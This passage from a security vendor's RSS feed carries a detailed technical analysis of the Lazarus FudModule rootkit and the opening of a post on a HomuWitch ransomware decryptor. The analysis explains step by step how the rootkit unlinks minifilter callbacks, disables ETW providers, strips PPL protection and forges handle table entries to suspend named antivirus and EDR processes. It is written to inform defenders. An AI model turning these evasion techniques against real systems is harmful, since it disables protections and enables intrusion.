<p>This attack starts by resolving <code>FltEnumerateFilters</code> and using it to find <code>FltGlobals.FrameList.rList</code>. This is a linked list of <code>FLTMGR!_FLTP_FRAME</code> structures, each representing a single <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/filter-manager-concepts#:~:text=Each%20of%20FltMgr%27s%20filter%20device%20objects%20is%20called%20a%20frame" target="_blank" rel="noreferrer noopener">filter manager frame</a>. From here, FudModule follows another linked list at <code>_FLTP_FRAME.AttachedVolumes.rList</code>. This linked list consists of <code>FLTMGR!_FLT_VOLUME</code> structures, describing minifilters attached to a particular file system volume. Interestingly, the rootkit performs a sanity check to make sure that the pool tag associated with the <code>_FLT_VOLUME</code> allocation is equal to <code>FMvo</code>. With the sanity check satisfied, FudModule iterates over <code>_FLT_VOLUME.Callbacks.OperationsLists</code>, which is an array of linked lists of <code>FLTMGR!_CALLBACK_NODE</code> structures, indexed by IRP major function codes. For instance, <code>OperationsLists[IRP_MJ_READ]</code> is a linked list describing all filters attached to the <code>read</code> operation on a particular volume. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1389" height="458" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check.png" alt="" class="wp-image-8205" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check.png 1389w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-300x99.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-1024x338.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/pooltag_check-768x253.png 768w" sizes="(max-width: 1389px) 100vw, 1389px" /><figcaption class="wp-element-caption">FudModule making sure the pool tag of a <code>_FLT_VOLUME</code> chunk is equal to <code>FMvo</code>. </figcaption></figure></div>
<p>For each <code>_CALLBACK_NODE</code>, FudModule obtains the corresponding <code>FLTMGR!_FLT_INSTANCE</code> and <code>FLTMGR!_FLT_FILTER</code> structures and uses them to decide whether to unlink the callback node. The first check is based on the name of the driver behind the filter. If it is <code>hmpalert.sys</code> (associated with the HitmanPro anti-malware solution), the callback will get immediately unlinked. Conversely, the callback is preserved if the driver’s name matches an entry in the following list: </p>
<figure class="wp-block-table"><table><tbody><tr><td><code>bindflt.sys </code></td><td><code>storqosflt.sys </code></td><td><code>wcifs.sys </code></td><td><code>cldflt.sys </code></td></tr><tr><td><code>filecrypt.sys </code></td><td><code>luafv.sys </code></td><td><code>npsvctrig.sys </code></td><td><code>wof.sys </code></td></tr><tr><td><code>fileinfo.sys </code></td><td><code>applockerfltr.sys </code></td><td><code>bfs.sys </code></td><td></td></tr></tbody></table><figcaption class="wp-element-caption">Kernel modules that are allowlisted to preserve their file system minifilters.</figcaption></figure>
<p>If there was no driver name match, FudModule uses <code>_FLT_FILTER.DefaultAltitude</code> to make its ultimate decision. Callbacks are unlinked if the default altitude belongs either to the range <code>[320000, 329999]</code> (<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/load-order-groups-and-altitudes-for-minifilter-drivers#:~:text=recover%20deleted%20files.-,FSFilter%20Anti%2DVirus,-320000%2D329999" target="_blank" rel="noreferrer noopener">defined</a> as <code>FSFilter Anti-Virus</code> by Microsoft) or the range <code>[360000, 389999]</code> (<code>FSFilter Activity Monitor</code>). Besides unlinking the callback nodes, FudModule also wipes the whole <code>_FLT_INSTANCE.CallbackNodes</code> array in the corresponding <code>_FLT_INSTANCE</code> structures. </p>
<h4 class="wp-block-heading">0x10 – Windows Filtering Platform </h4>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/fwp/windows-filtering-platform-start-page" target="_blank" rel="noreferrer noopener">Windows Filtering Platform</a> (WFP) is a documented set of APIs designed for host-based network traffic filtering. The WFP API offers capabilities for deep packet inspection as well as for modification or dropping of packets at various layers of the network stack. This is very useful functionality, so it serves as a foundation for a lot of Windows network security software, including intrusion detection/prevention systems, firewalls, and network monitoring tools. The WFP API is accessible both in user and kernel space, with the kernel part offering more powerful functionality. Specifically, the kernel API allows for installing so-called <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/network/introduction-to-windows-filtering-platform-callout-drivers" target="_blank" rel="noreferrer noopener">callout drivers,</a> which can essentially hook into the network stack and perform arbitrary actions on the processed network traffic. FudModule is trying to interfere with the installed callout routines in an attempt to disrupt the security they provide.  </p>
<p>This rootkit technique is executed only when Kaspersky drivers (<code>klam.sys</code>, <code>klif.sys</code>, <code>klwfp.sys</code>, <code>klwtp.sys</code>, <code>klboot.sys</code>) are present on the targeted system and at the same time Symantec/Broadcom drivers (<code>symevnt.sys</code>, <code>bhdrvx64.sys</code>, <code>srtsp64.sys</code>) are absent. This check appears to be a new addition in the current version of FudModule. In other aspects, our analysis revealed that the core idea of this technique matches the <a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2022/papers/VB2022-Lazarus-and-BYOVD-evil-to-the-Windows-core.pdf" target="_blank" rel="noreferrer noopener">findings</a> described by ESET researchers during their analysis of the previous version. </p>
<p>Initially, FudModule resolves <code>netio!WfpProcessFlowDelete</code> to locate the address of <code>netio!gWfpGlobal</code>. As the name suggests, this is designed to store WFP-related global variables. Although its exact layout is undocumented, it is <a href="https://codemachine.com/articles/find_wfp_callouts.html" target="_blank" rel="noreferrer noopener">not hard to find</a> the build-specific offset where a pointer to an array of WFP callout structures is stored (with the length of this array stored at an offset immediately preceding the pointer). FudModule follows this pointer and iterates over the array, skipping all callouts implemented in <code>ndu.sys</code>, <code>tcpip.sys</code>, <code>mpsdrv.sys</code>, or <code>wtd.sys</code>. For the remaining callouts, FudModule accesses the callout structure’s flags and sets the flag stored in the least significant bit. While the callout structure itself is undocumented, this particular <code>0x01</code> flag is <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/fwpsk/ns-fwpsk-fwps_callout2_" target="_blank" rel="noreferrer noopener">documented in another structure</a>, where it is called <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code>. The documentation reads “if this flag is specified, the filter engine calls the callout driver’s classifyFn2 callout function only if there is a context associated with the data flow”. In other words, setting this flag will conditionally disable the callout in cases where no flow context is available (see the implementation of <code>netio!IsActiveCallout</code> below). </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1143" height="1127" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout.png" alt="" class="wp-image-8206" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout.png 1143w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-300x296.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-1024x1010.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/is_active_callout-768x757.png 768w" sizes="(max-width: 1143px) 100vw, 1143px" /><figcaption class="wp-element-caption">The meaning of the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag can be nicely seen in <code>netio!IsActiveCallout</code>. If this flag is set and no flow context can be obtained, <code>IsActiveCallout</code> will return <code>false</code> (see the highlighted part of the condition). </figcaption></figure></div>
<p>While this rootkit technique has the potential to interfere with some WFP callouts, it will not be powerful enough to disrupt all of them. Many WFP callouts registered by security vendors already have the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag set by design, so they will not be affected by this technique at all. Given the initial driver check, it seems like this technique might be targeted directly at Kaspersky. While Kaspersky does install dozens of WFP callouts, about half of those are designed for processing flows and already have the <code>FWP_CALLOUT_FLAG_CONDITIONAL_ON_FLOW</code> flag set. Since we refrained from reverse engineering our competitor’s products, the actual impact of this rootkit technique remains unclear. </p>
<h4 class="wp-block-heading">0x20 – Missing </h4>
<p>So far, the rootkit techniques we analyzed were similar to those detailed by ESET in their paper on the earlier rootkit variant. But starting from now, we are getting into a whole new territory. The <code>0x20</code> technique, which used to deal with Event Tracing for Windows (ETW), has been deprecated, leaving the <code>0x20</code> bit unused. Instead, there are two new replacement techniques that target ETW, indexed with the bits <code>0x40</code> and <code>0x80</code>. The indexing used to end at <code>0x40</code>, which was a technique to obstruct forensic analysis by disabling prefetch file creation. However, now the bits go all the way up to <code>0x200</code>, with two additional new techniques that we will delve into later in this blog. </p>
<h4 class="wp-block-heading">0x40 – Event Tracing for Windows: System Loggers</h4>
<p><a href="https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing" target="_blank" rel="noreferrer noopener">Event Tracing for Windows</a> (ETW) serves as a high-performance mechanism dedicated to tracing and logging events. In a nutshell, its main purpose is to connect providers (who generate some log events) with consumers (who process the generated events). Consumers can define which events they would like to consume, for instance, by selecting some specific providers of interest. There are providers built into the operating system, like <code>Microsoft-Windows-Kernel-Process</code> which generates process-related events, such as process creation or termination. However, third-party applications can also define their custom providers.  </p>
<p>While many built-in providers are not security-related, some generate events useful for detection purposes. For instance, the <code>Microsoft-Windows-Threat-Intelligence</code> provider makes it possible to watch for suspicious events, such as writing another process’ memory. Furthermore, various security products take advantage of ETW by defining their custom providers and consumers. FudModule tampers with ETW internals in an attempt to intercept suspicious events and thus evade detection. </p>
<p>The main idea behind this rootkit technique is to disable system loggers by zeroing out <code>EtwpActiveSystemLoggers</code>. The specific implementation of how this address is found varies based on the target Windows version. On newer builds, the <code>nt!EtwSendTraceBuffer</code> routine is resolved first and used to find <code>nt!EtwpHostSiloState</code>. This points to an <code>_ETW_SILODRIVERSTATE</code> structure, and using a hardcoded build-specific offset, the rootkit can access <code>_ETW_SILODRIVERSTATE.SystemLoggerSettings.EtwpActiveSystemLoggers</code>. On older builds, the rootkit first scans the entire ntoskrnl <code>.text</code> section, searching for opcode bytes specific to the <code>EtwTraceKernelEvent</code> prologue. The rootkit then extracts the target address from the <code>mov ebx, cs:EtwpActiveSystemLoggers</code> instruction that immediately follows. </p>
<p>To understand the technique’s impact, we can take a look at how <code>EtwpActiveSystemLoggers</code> is used in the kernel. Accessed on a bit-by-bit basis, its least significant eight bits might be set in the <code>EtwpStartLogger</code> routine. This indicates that the value itself is a bit field, with each bit signifying whether a particular system logger is active. Looking at the other references to <code>EtwpActiveSystemLoggers</code>, a clear pattern emerges. After its value is read, there tends to be a loop guarded by a <code>bsf</code> instruction (bit scan forward). Inside the loop tends to be a call to an ETW-related routine that might generate a log event. The purpose of this loop is to iterate over the set bits of <code>EtwpActiveSystemLoggers</code>. When the rootkit clears all the bits, the body of the loop will never get executed, meaning the event will not get logged. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="1796" height="579" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1.png" alt="" class="wp-image-8320" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1.png 1796w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-300x97.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-1024x330.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-768x248.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/etw_activesystemloggers-1-1536x495.png 1536w" sizes="(max-width: 1796px) 100vw, 1796px" /><figcaption class="wp-element-caption">Example decompilation of <code>EtwpTraceKernelEventWithFilter</code>. After the rootkit zeroes out <code>EtwpActiveSystemLoggers</code>, <code>EtwpLogKernelEvent</code> will never get called from inside the loop since the condition guarding the loop will always evaluate to zero. </figcaption></figure></div>
<h4 class="wp-block-heading">0x80 – Event Tracing for Windows: Provider GUIDs </h4>
<p>Complementing the previous technique, the <code>0x80</code> technique is also designed to blind ETW, however using a different approach. While the <code>0x40</code> technique was quite generic – aiming to disable all system loggers – this technique operates in a more surgical fashion. It contains a <a href="https://github.com/avast/ioc/tree/master/FudModule#targeted-etw-provider-guids" target="_blank" rel="noreferrer noopener">hardcoded list</a> of 95 GUIDs, each representing an identifier for some specific ETW provider. The rootkit iterates over all these GUIDs and attempts to disable the respective providers. While this approach requires the attackers to invest some effort into assembling the list of GUIDs, it also offers them a finer degree of control over which ETW providers they will eventually disrupt. This allows them to selectively target providers that pose a higher detection risk and ignore the rest to minimize the rootkit’s impact on the target system. </p>
<p>This technique starts by obtaining the address of <code>EtwpHostSiloState</code> (or <code>EtwSiloState</code> on older builds). If <code>EtwpHostSiloState</code> was already resolved during the previous technique, the rootkit just reuses the address. If not, the rootkit follows the reference chain <code>PsGetCurrentServerSiloName</code> -> <code>PsGetCurrentServerSiloGlobals</code> -> <code>PspHostSiloGlobals</code> -> <code>EtwSiloState</code>. In both scenarios, the result is that the rootkit just obtained a pointer to an <code>_ETW_SILODRIVERSTATE</code> structure, which contains a member named <code>EtwpGuidHashTable</code>. As the name suggests, this is a hash table holding ETW GUIDs (<code>_ETW_GUID_ENTRY</code>).  </p>
<p>FudModule then iterates over its hardcoded list of GUIDs and attempts to locate each of them in the hash table. Although the hash table internals are officially undocumented, Yarden Shafir provided a nice description in her <a href="https://windows-internals.com/exploiting-a-simple-vulnerability-in-35-easy-steps-or-less/" target="_blank" rel="noreferrer noopener">blog</a> on exploiting an ETW vulnerability. In a nutshell, the hash is computed by just splitting the 128-bit GUID into four 32-bit parts and XORing them together. By ANDing the hash with <code>0x3F</code>, an index of the relevant hash bucket (<code>_ETW_HASH_BUCKET</code>) can be obtained. The bucket contains three linked lists of <code>_ETW_GUID_ENTRY</code> structures, each designated for a different type of GUIDs. FudModule always opts for the first one (<code>EtwTraceGuidType</code>) and traverses it, looking for the relevant <code>_ETW_GUID_ENTRY</code> structure. </p>
<p>With a pointer to <code>_ETW_GUID_ENTRY</code> corresponding to a GUID of interest, FudModule proceeds to clear <code>_ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled</code>. The purpose of this modification seems self-explanatory: FudModule is trying to disable the ETW provider. To better understand how this works, let’s examine <code>nt!EtwEventEnabled</code> (see the decompiled code below). This is a routine that often serves as an <code>if</code> condition before <code>nt!EtwWrite</code> (or <code>nt!EtwWriteEx</code>) gets called.  </p>
<p>Looking at the decompilation, there are two <code>return 1</code> statements. Setting <code>ProviderEnableInfo.IsEnabled</code> to zero ensures that the first one is never reached. However, the second <code>return</code> statement could still potentially execute. To make sure this doesn’t happen, the rootkit also iterates over all <code>_ETW_REG_ENTRY</code> structures from the <code>_ETW_GUID_ENTRY.RegListHead</code> linked list. For each of them, it makes a single doubleword write to zero out four masks, namely <code>EnableMask</code>, <code>GroupEnableMask</code>, <code>HostEnableMask</code>, and <code>HostGroupEnableMask</code> (or only <code>EnableMask</code> and <code>GroupEnableMask</code> on older builds, where the latter two masks were not yet introduced).  </p>
<div class="wp-block-image">
<figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="610" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1024x610.png" alt="" class="wp-image-8208" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1024x610.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-300x179.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-768x457.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2-1536x915.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/EtwEventEnabled-2.png 1610w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Decompilation of <code>nt!EtwEventEnabled</code>. After the rootkit has finished its job, this routine will always return <code>false</code> for events related to the targeted GUIDs. This is because the rootkit cleared both <code>_ETW_GUID_ENTRY.ProviderEnableInfo.IsEnabled</code> and <code>_ETW_REG_ENTRY.GroupEnableMask</code>, forcing the highlighted conditions to fail. </figcaption></figure></div>
<p>Clearing these masks also has an additional effect beyond making <code>EtwEventEnabled</code> always return <code>false</code>. These four are all also checked in <code>EtwWriteEx</code> and this modification effectively neutralizes this routine, as when no mask is set for a particular event registration object, execution will never proceed to a lower-level routine (<code>nt!EtwpEventWriteFull</code>) where the bulk of the actual event writing logic is implemented. </p>
<h4 class="wp-block-heading">0x100 – Image Verification Callbacks </h4>
<p>Image verification callbacks are yet another callback mechanism disrupted by FudModule. Designed similarly to process/thread/image callbacks, image verification callbacks are supposed to get invoked whenever a new driver image is loaded into kernel memory. This represents useful functionality for anti-malware software, which can leverage them to blocklist known malicious or vulnerable drivers (though there might be some problems with this blocking approach as the callbacks get invoked asynchronously). Furthermore, image verification callbacks also offer a valuable source of telemetry, providing visibility into suspicious driver load events. The callbacks can be registered using the <code>SeRegisterImageVerificationCallback</code> routine, which is publicly undocumented. As a result of this undocumented nature, the usage here is limited mainly to deep-rooted anti-malware software. For instance, Windows Defender registers a callback named <code>WdFilter!MpImageVerificationCallback</code>. </p>
<p>As the kernel internally manages image verification callbacks in a similar fashion to some of the other callbacks we already explored, the rootkit’s removal implementation will undoubtedly seem familiar. First, the rootkit resolves the <code>nt!SeRegisterImageVerificationCallback</code> routine and scans its body to locate <code>nt!ExCbSeImageVerificationDriverInfo</code>. Dereferencing this, it obtains a pointer to a <code>_CALLBACK_OBJECT</code> structure, which holds the callbacks in the <code>_CALLBACK_OBJECT.RegisteredCallbacks</code> linked list. This list consists of <code>_CALLBACK_REGISTRATION</code> structures, where the actual callback function pointer can be found in <code>_CALLBACK_REGISTRATION.CallbackFunction</code>. FudModule clears the entire list by making the <code>RegisteredCallbacks</code> head <code>LIST_ENTRY</code> point directly to itself. Additionally, it also walks the original linked list and similarly short-circuits each individual <code>_CALLBACK_REGISTRATION</code> entry in the list. </p>
<p>This rootkit technique is newly implemented in the current version of FudModule, and we can only speculate on the motivation here. It seems to be designed to help avoid detection when loading either a vulnerable or a malicious driver. However, it might be hard to understand why Lazarus should want to load an additional driver if they already have control over the kernel. It would make little sense for them to load a vulnerable driver, as they already established their kernel read/write primitive by exploiting a zero-day in a preinstalled Windows driver. Further, even if they were exploiting a vulnerable driver in the first place (as was the case in the previous version of FudModule), it would be simply too late to unlink the callback now. By the time this rootkit technique executes, the image verification callback for the vulnerable driver would have already been invoked. Therefore, we believe the most likely explanation is that the threat actors are preparing the grounds for loading some malicious driver later. Perhaps the idea is that they just want to be covered in case they decide to deploy some additional kernel-mode payload in the future. </p>
<h4 class="wp-block-heading">0x200 – Direct Attacks on Security Software </h4>
<p>The rootkit techniques we explored up to this point were all somewhat generic. Each targeted some security-related system component and, through it, indirectly interfered with all security software that relied on the component. In contrast, this final technique goes straight to the point and aims to directly disable specific security software. In particular, the targeted security solutions are AhnLab V3 Endpoint Security, Windows Defender, CrowdStrike Falcon, and HitmanPro. </p>
<p>The attack starts with the rootkit obtaining the address of its own <code>_EPROCESS</code> structure. This is done using <code>NtDuplicateHandle</code> to duplicate the current process pseudohandle and then calling <code>NtQuerySystemInformation</code> to get <code>SystemExtendedHandleInformation</code>. With the extended handle information, the rootkit looks for an entry corresponding to the duplicated handle and obtains the <code>_EPROCESS</code> pointer from there. Using <code>NtQuerySystemInformation</code> to leak kernel pointers is a well-known technique that Microsoft <a href="https://windows-internals.com/kaslr-leaks-restriction/" target="_blank" rel="noreferrer noopener">aims to restrict</a> by gradually building up mitigations. However, attackers capable of enabling <code>SeDebugPrivilege</code> at high integrity levels are out of scope of these mitigations, so FudModule can keep using this technique, even on the upcoming 24H2 builds. With the <code>_EPROCESS</code> pointer, FudModule disables mitigations by zeroing out <code>_EPROCESS.MitigationFlags</code>. Then, it also clears the <code>EnableHandleExceptions</code> flag from <code>_EPROCESS.ObjectTable.Flags</code>. We believe this is meant to increase stability in case something goes wrong later during the handle table entry manipulation technique that we will describe shortly.  </p>
<p>Regarding the specific technique used to attack the security solutions, AhnLab is handled differently than the other three targets. FudModule first checks if AhnLab is even running, by traversing the <code>ActiveProcessLinks</code> linked list and looking for a process named <code>asdsvc.exe</code> (AhnLab Smart Defense Service) with <code>_EPROCESS.Token.AuthenticationId</code> set to <code>SYSTEM_LUID</code>. If such a process is found, FudModule clears its <code>_EPROCESS.Protection</code> byte, effectively toggling off PPL protection for the process. While this <code>asdsvc.exe</code> process is under usual circumstances meant to be protected at the standard <code>PsProtectedSignerAntimalware</code> level, this modification makes it just a regular non-protected process. This opens it up to further attacks from user mode, where now even other privileged, yet non-protected processes could be able to tamper with it. However, we suspect the main idea behind this technique might be to disrupt the link between AhnLab’s user-mode and kernel-mode components. By removing the service’s PPL protection, the kernel-mode component might no longer recognize it as a legitimate AhnLab component. However, this is just a speculation as we didn’t test the real impact of this technique. </p>
<h6 class="wp-block-heading"><strong>Handle Table Entry Manipulation</strong> </h6>
<p>The technique employed to attack Defender, CrowdStrike, and HitmanPro is much more intriguing: FudModule attempts to suspend them using a new handle table entry manipulation technique. To better understand this technique, let’s begin with a brief <a href="https://imphash.medium.com/windows-process-internals-a-few-concepts-to-know-before-jumping-on-memory-forensics-part-5-a-2368187685e" target="_blank" rel="noreferrer noopener">background on handle tables</a>. When user-mode code interacts with kernel objects such as processes, files, or mutexes, it typically doesn’t work with the objects directly. Instead, it references them indirectly through handles. Internally, the kernel must be able to translate the handle to the corresponding object, and this is where the handle table comes in. This per-process table, available at <code>_EPROCESS.ObjectTable.TableCode</code>, serves as a mapping from handles to the underlying objects. Organized as an array, it is indexed by the integer value of the handle. Each element is of type <code>_HANDLE_TABLE_ENTRY</code> and contains two crucial pieces of information: a (compressed) pointer to the object’s header (<code>nt!_OBJECT_HEADER</code>) and access bits associated with the handle. </p>
<p>Due to this handle design, kernel object access checks are typically split into two separate logical steps. The first step happens when a process attempts to acquire a handle (such as opening a file with <code>CreateFile</code>). During this step, the current thread’s token is typically checked against the target object’s security descriptor to ensure that the thread is allowed to obtain a handle with the desired access mask. The second check takes place when a process performs an operation using an already acquired handle (such as writing to a file with <code>WriteFile</code>). This typically only involves verifying that the handle is powerful enough (meaning it has the right access bits) for the requested operation.  </p>
<p>FudModule executes as a non-protected process, so it theoretically shouldn’t be able to obtain a powerful handle to a PPL-protected process such as the CrowdStrike Falcon Service. However, leveraging the kernel read/write primitive, FudModule has the ability to access the handle table directly. This allows it to craft a custom handle table entry with control over both the referenced object and the access bits. This way, it can conjure an arbitrary handle to any object, completely bypassing the check typically needed for handle acquisition. What’s more, if it sets the handle’s access bits appropriately, it will also satisfy the subsequent handle checks when performing its desired operations. </p>
<p>To prepare for the handle table entry manipulation technique, FudModule creates a dummy thread that just puts itself to sleep immediately. The thread itself is not important. What is important is that by calling <code>CreateThread</code>, the rootkit just obtained a thread handle with <code>THREAD_ALL_ACCESS</code> rights. This handle is the one that will have its handle table entry manipulated. Since it already has very powerful access bits, the rootkit will not even have to touch its <code>_HANDLE_TABLE_ENTRY.GrantedAccessBits</code>. All it needs to do is overwrite <code>_HANDLE_TABLE_ENTRY.ObjectPointerBits</code> to redirect the handle to an arbitrary object of its choice. This will make the handle reference that object and enable the rootkit to perform privileged operations on it. Note that <code>ObjectPointerBits</code> is not the whole pointer to the object: it only represents 44 bits of the 64-bit pointer. But since the <code>_OBJECT_HEADER</code> pointed to by <code>ObjectPointerBits</code> is guaranteed to be aligned (meaning the least significant four bits must be zero) and in kernel address space (meaning the most significant sixteen bits must be <code>0xFFFF</code>), the remaining 20 bits can be easily inferred. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="505" height="251" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread.png" alt="" class="wp-image-8209" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread.png 505w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/sleep_thread-300x149.png 300w" sizes="(max-width: 505px) 100vw, 505px" /><figcaption class="wp-element-caption">A dummy thread whose handle will be the subject of handle table entry manipulation. </figcaption></figure></div>
<p>The specific processes targeted by this technique are <code>MsSense.exe</code>, <code>MsMpEng.exe</code>, <code>CSFalconService.exe</code>, and <code>hmpalert.exe</code>. FudModule first finds their respective <code>_EPROCESS</code> structures, employing the same algorithm as it did to find the AhnLab service. Then, it performs a sanity check to ensure that the dummy thread handle is not too high by comparing it with <code>_EPROCESS.ObjectTable.NextHandleNeedingPool</code> (which holds information on the maximum possible handle value given the current handle table allocation size). With the sanity check satisfied, FudModule accesses the handle table itself (<code>EPROCESS.ObjectTable.TableCode</code>) and modifies the dummy thread’s <code>_HANDLE_TABLE_ENTRY</code> so that it points to the <code>_OBJECT_HEADER</code> of the target <code>_EPROCESS</code>. Finally, the rootkit uses the redirected handle to call <code>NtSuspendProcess</code>, which will suspend the targeted process.  </p>
<p>It might seem odd that the manipulated handle used to be a thread handle, but now it’s being used as a process handle. In practice, there is nothing wrong with this since the handle table itself holds no object type information. The object type is stored in <code>_OBJECT_HEADER.TypeIndex</code> so when the rootkit redirected the handle, it also effectively changed the handle object type. As for the access bits, the original <code>THREAD_ALL_ACCESS</code> gets reinterpreted in the new context as <code>PROCESS_ALL_ACCESS</code> since both constants share the same underlying value. </p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="932" height="190" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry.png" alt="" class="wp-image-8210" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry.png 932w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry-300x61.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/windbg_handle_table_entry-768x157.png 768w" sizes="(max-width: 932px) 100vw, 932px" /><figcaption class="wp-element-caption">The manipulated dummy thread handle (<code>0x168</code>), now referencing a process object. </figcaption></figure></div>
<p>Though suspending the target process might initially appear to be a completed job, FudModule doesn’t stop here. After taking five seconds of sleep, it also attempts to iterate over all the threads in the target process, suspending them one by one. When all threads are suspended, FudModule uses <code>NtResumeProcess</code> to resume the suspended process. At this point, while the process itself is technically resumed, its individual threads remain suspended, meaning the process is still effectively in a suspended state. We can only speculate why Lazarus implemented process suspension this way, but it seems like an attempt to make the technique stealthier. After all, a suspended process is much more conspicuous than just several threads with increased suspend counts. </p>
<p>To enumerate threads, FudModule calls <code>NtQuerySystemInformation</code> with the <code>SystemExtendedHandleInformation</code> class. Iterating over the returned handle information, FudModule searches for thread handles from the target process. The owner process is checked by comparing the PID of the target process with <code>SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.UniqueProcessId</code> and the type is checked by comparing <code>SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX.ObjectTypeIndex</code> with the thread type index, which was previously obtained using <code>NtQueryObject</code> to get <code>ObjectTypesInformation</code>. For each enumerated thread (which might include some threads multiple times, as there might be more than one open handle to the same thread), FudModule manipulates the dummy thread handle so that it points to the enumerated thread and suspends it by calling <code>SuspendThread</code> on the manipulated handle. Finally, after all threads are suspended and the process resumed, FudModule restores the manipulated handle to its original state, once again referencing the dummy sleep thread. </p>
<h2 class="wp-block-heading">Conclusion </h2>
<p>The Lazarus Group remains among the most <a href="https://attack.mitre.org/groups/G0032/" target="_blank" rel="noreferrer noopener">prolific and long-standing</a> advanced persistent threat actors. Though their signature tactics and techniques are well-recognized by now, they still occasionally manage to surprise us with an unexpected level of technical sophistication. The FudModule rootkit serves as the latest example, representing one of the most complex tools Lazarus holds in their arsenal. Recent updates examined in this blog show Lazarus’ commitment to keep actively developing this rootkit, focusing on improvements in both stealth and functionality. </p>
<p>With their admin-to-kernel zero-day now burned, Lazarus is confronted with a significant challenge. They can either discover a new zero-day exploit or revert to their old BYOVD techniques. Regardless of their choice, we will continue closely monitoring their activity, eager to see how they will cope with these new circumstances. </p>
<h4 class="wp-block-heading">Indicators of Compromise (IoCs) </h4>
<p>A YARA rule for the latest FudModule variant is available at <a href="https://github.com/avast/ioc/tree/master/FudModule#yara" target="_blank" rel="noreferrer noopener">https://github.com/avast/ioc/tree/master/FudModule#yara</a>.</p>
<p>The post <a href="https://decoded.avast.io/janvojtesek/lazarus-and-the-fudmodule-rootkit-beyond-byovd-with-an-admin-to-kernel-zero-day/">Lazarus and the FudModule Rootkit: Beyond BYOVD with an Admin-to-Kernel Zero-Day</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></content:encoded>
</item>
<item>
<title>Decrypted: HomuWitch Ransomware</title>
<link>https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware</link>
<dc:creator><![CDATA[Threat Research Team]]></dc:creator>
<pubDate>Tue, 20 Feb 2024 14:30:43 +0000</pubDate>
<category><![CDATA[PC]]></category>
<category><![CDATA[decryptor]]></category>
<category><![CDATA[decryptors]]></category>
<category><![CDATA[ransomware]]></category>
<guid isPermaLink="false">https://decoded.avast.io/?p=8077</guid>
<description><![CDATA[<p>HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies.</p>
<p>The post <a href="https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/">Decrypted: HomuWitch Ransomware</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
]]></description>
<content:encoded><![CDATA[
<p>HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users – individuals – rather than institutions and companies. Its prevalence isn’t remarkably large, nor is the requested ransom payment amount, which has allowed the strain to stay relatively under the radar thus far.</p>
<p>During our investigation of the threat, we found a vulnerability, which allowed us to create a free decryption tool for all the HomuWitch victims. We are now sharing this tool publicly to help impacted individuals decrypt their files, free of charge.</p>
